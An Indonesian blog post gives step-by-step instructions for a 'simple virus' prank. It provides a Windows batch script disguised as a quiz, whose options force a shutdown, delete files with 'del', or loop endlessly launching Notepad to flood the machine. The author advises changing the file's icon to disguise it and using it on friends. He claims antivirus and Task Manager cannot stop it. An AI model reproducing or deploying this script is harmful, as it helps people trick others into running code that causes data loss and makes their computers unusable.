Membuat virus sederhana, sekedar iseng


Saat ini mungkin jenis virus komputer yang beredar sangat banyak jenisnya, mulai dari worm dan trojan serta lainnya. Virus komouter menyerang dari beberapa sumber bisa melalui transfer flashdisk bisa juga secara tidak sengaja kita mendownload aplikasi-aplikasi atau sesuatu yang kurang jelas dimengerti, bisa saja film xxx yang sekarang mulai disisipi virus komputer. Untuk itu waspada dan pastikan laptop/pc anda terlindungi dengan aman, pergunakan antivirus yang memang jelas ampuh keunggulannya. Dulu saya juga sempat kesal dengan virus komputer, tiba-tiba muncul layar biru dan gak bisa dioperasikan lagi laptop, terpaksa harus install ulang dan banyak data yang terhapus karena belum sempat backup. Kali ini saya akan memberikan bagaimana membuat virus komputer sederhana. Sebenarnya bukan virus, tapi sebuah aplikasi yang berjalan seperti layaknya virus menyerang laptop/pc anda. Bagaimana bisa terjadi ?? dimana anti virus tidak mendeteksi ini virus bahkan taksmanager pun tidak fungsi untuk mengeluarkan. Ini dibuat hanya sekedar iseng bagi temen-temen yang oot ahahaha .. kasian juga ya kalo yang gak ngerti pasti udah khawatir sangatt …. monggo di ikuti langkah-langkahnya …

1. Buka notepad

2. Copas script code dibawah ini di notepad

@echo off

title quiz wants to be a millionaire
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. Bingung
echo 2. Format Komputer
echo 3. Yahhhh…
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * Kurang Beruntung nih
msg * Kurang Iman kali 😀
msg * Aduh ini gimana kok tambah parah
msg * Masukin ke UGD aja ya
msg * Telpon 311 saja ya
@ECHO off
:top
START %SystemRoot%
\system32\notepad.exe
GOTO top

 

3. Selanjutnya, simpan dengan extensi .bat (ex: coba.bat)

4. Kalau bisa di ganti iconnya, menggunakan tune up utilitis 2012

5. Lakukan aksi jailmu … ahahaha

Semoga bermanfaat broo n sist

Advertisements

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s